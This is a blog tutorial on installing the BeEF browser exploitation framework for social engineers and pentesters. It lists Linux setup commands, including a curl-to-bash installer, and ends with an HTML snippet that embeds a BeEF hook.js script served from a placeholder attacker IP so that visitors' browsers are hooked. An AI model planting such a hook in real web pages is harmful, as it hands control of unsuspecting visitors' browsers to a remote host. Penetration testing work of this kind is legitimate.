Subliminal Hacking
The Art and Science of Social Engineering



How-To

January 3, 2013

How To Install BeEF … Browser Exploitation Framework

The Browser Exploitation Framework (BeEF) is an excellent tool for Social Engineers and Pentesters. This video provides a quick How To on installing it under Linux. The install from start to finish takes around 10 minutes, but the video has been condensed as to not waste your time. A list of some of the commands I used for copy and pasting purposes are provided below.

Commands used:

lsb_release -a

sudo apt-get update

sudo apt-get install curl git ruby build-essential libsqlite3-ruby libsqlite3-dev libssl-dev

bash < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer )

sudo echo [[ -s “$HOME/.rvm/scripts/rvm” ]] && . “$HOME/.rvm/scripts/rvm” # Load RVM function’ >> ~/.bash_profile

rvm install ruby-1.9.2-p290

gem install bundler

git clone git://github.com/beefproject/beef.git

bundle install

nano config.yaml (in the root of the beef directory)

 

Helpful Hint – To enable the BeEF hook in your web page during an engagement add the hook script in before or after the body in your html file. Here is an example:

<html>
<body>
HOOK ME BABY ONE MORE TIME!!
</body>
<script src=”http://YOUR-IP-HERE:3000/hook.js”></script>
</html>

Be Sociable, Share!



    About the Author

    Dale Pearson
    has worked in IT since 1998, Infosec since 2004, and studied and performed hypnosis, mentalism etc since 2009. Dale is a full time Red Teamer with a love of social engineering and qualified hypnotherapist. He spends a great deal of time researching the various skills and techniques that make up the art and science of Social Engineering.




    4 Comments


    1. Studet

      Good one!
      everything is working fine but when i try to connect msf with database.yml file then it’s give me error

      Failed to connect to the database: FATAL: Ident authentication failed for user blah blah
      any solution?


    2. Dale

      Sorry I havent seen that one before, sounds like some other config file needs tweaking. Was this all fresh install, or you running in on Backtrack?


    3. Thanks for putting this together, very useful.



    Leave a Reply

    Your email address will not be published.

    Time limit is exhausted. Please reload CAPTCHA.

    This site uses Akismet to reduce spam. Learn how your comment data is processed.